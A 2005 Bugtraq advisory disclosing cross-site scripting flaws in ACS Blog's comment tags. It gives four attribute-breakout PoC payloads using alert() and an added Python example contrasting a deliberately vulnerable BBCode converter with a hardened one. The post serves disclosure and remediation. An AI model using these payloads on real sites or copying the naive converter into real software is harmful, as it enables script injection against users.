
List:       bugtraq
Subject:    Multiple XSS vulnerabilities in ACS Blog
From:       Dan Crowley <dan.crowley () gmail ! com>
Date:       2005-03-28 23:15:34
Message-ID: bc0c5dbd05032815152f763360 () mail ! gmail ! com

These vulnerabilities have been tested on the latest version of ACS
Blog (v1.1.1).

In the comments section of ACS Blog, it is possible to execute an XSS
attack through the [link], [mail], and [img] tags: single quotes and
spaces inside the tag arguments are not filtered, so an argument can
close the quoted href/src attribute that the tag is rendered into and
append its own attributes, such as an onmouseover or onload event
handler.

Examples/PoCs:

[link=http://www.google.com' onmouseover='alert("XSS vulnerability")' o=']Don't you wanna see where this link goes?[/link]

[mail=bugtraq@securityfocus.com' onmouseover='alert("XSS vulnerability")' o=']Mr. Wiggles[/mail]

[img]http://www.example.com/image.jpg' onload='alert("XSS vulnerability")' o='[/img]

[link=http://www.google.com target=_blank' onmouseover=a=/Vulnerability/;alert(a.source) o=']Hooray[/link]
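The following is an added Python example, not ACS Blog's own code (the advisory does not reproduce it): a minimal BBCode-to-HTML converter written in the shape the PoCs imply, beside a hardened version, run over inputs modelled on the PoCs above. The tag names, the single-quoted href/src output and the sample inputs are assumptions. The hardened version goes one step beyond the advisory: besides rejecting quotes and spaces in a tag argument, it allow-lists the URL scheme (so a javascript: link is also refused) and HTML-escapes the comment body before any tag is expanded.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed inputs modelled on the advisory's PoCs (assumed, not real ACS Blog data).
POC_LINK = "[link=http://www.google.com' onmouseover='alert(\"XSS\")' o=']Click[/link]"
POC_MAIL = "[mail=bugtraq@securityfocus.com' onmouseover='alert(\"XSS\")' o=']Mr. Wiggles[/mail]"
POC_IMG = "[img]http://www.example.com/image.jpg' onload='alert(\"XSS\")' o='[/img]"
BENIGN = "[link=http://www.example.com/page?a=1&b=2]example[/link] and [img]http://www.example.com/p.jpg[/img]"

# Assumed tag grammar: [link=URL]text[/link], [mail=ADDR]text[/mail], [img]URL[/img].
_LINK = re.compile(r"\[link=(.*?)\](.*?)\[/link\]", re.S)
_MAIL = re.compile(r"\[mail=(.*?)\](.*?)\[/mail\]", re.S)
_IMG = re.compile(r"\[img\](.*?)\[/img\]", re.S)


def naive_bbcode_to_html(text):
    """Vulnerable converter: splices the raw tag argument into a single-quoted attribute.

    A quote in the argument closes the attribute and anything after it becomes
    new attributes on the generated element, which is exactly what the PoCs do.
    """
    text = _LINK.sub(lambda m: "<a href='%s'>%s</a>" % (m.group(1), m.group(2)), text)
    text = _MAIL.sub(lambda m: "<a href='mailto:%s'>%s</a>" % (m.group(1), m.group(2)), text)
    text = _IMG.sub(lambda m: "<img src='%s'>" % m.group(1), text)
    return text


# Hardened converter ---------------------------------------------------------

_ALLOWED_SCHEMES = {"http", "https"}
# RFC 3986 unreserved + reserved characters plus '%'. No quotes, spaces, '<' or '>'.
_URL_CHARS = re.compile(r"[A-Za-z0-9\-._~:/?#\[\]@!$&()*+,;=%]+")
_EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def _safe_url(raw):
    """Return the attribute-escaped URL, or None if it must not be rendered as a link."""
    if not _URL_CHARS.fullmatch(raw):
        return None
    try:
        scheme = urlsplit(raw).scheme.lower()
    except ValueError:  # e.g. malformed IPv6 literal
        return None
    if scheme not in _ALLOWED_SCHEMES:
        return None
    return html.escape(raw, quote=True)


def _render_link(m):
    url = _safe_url(html.unescape(m.group(1)))
    return m.group(0) if url is None else "<a href='%s'>%s</a>" % (url, m.group(2))


def _render_mail(m):
    addr = html.unescape(m.group(1))
    if not _EMAIL.fullmatch(addr):
        return m.group(0)
    return "<a href='mailto:%s'>%s</a>" % (html.escape(addr, quote=True), m.group(2))


def _render_img(m):
    url = _safe_url(html.unescape(m.group(1)))
    return m.group(0) if url is None else "<img src='%s'>" % url


def safe_bbcode_to_html(text):
    """Hardened converter.

    1. Escape the whole comment so no raw '<', '>', '&' or quote survives.
    2. Re-expand only those tags whose (unescaped) argument passes validation,
       re-escaping the validated value for the single-quoted attribute it lands in.
       A tag that fails validation stays on the page as harmless escaped text.
    """
    out = html.escape(text, quote=True)
    out = _LINK.sub(_render_link, out)
    out = _MAIL.sub(_render_mail, out)
    out = _IMG.sub(_render_img, out)
    return out


if __name__ == "__main__":
    for sample in (POC_LINK, POC_MAIL, POC_IMG, BENIGN):
        print("naive:", naive_bbcode_to_html(sample))
        print("safe: ", safe_bbcode_to_html(sample))
        print()
```

Running the script shows the naive output carrying onmouseover/onload attributes, while the hardened output renders the benign sample as normal anchor and img elements and leaves every PoC as inert escaped text.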

----------
Vendor responded within 2 hours of notification, notified users with
the security alert on its main page, and patched the vulnerabilities
within another couple of hours.
----------

Cheers,
Dan
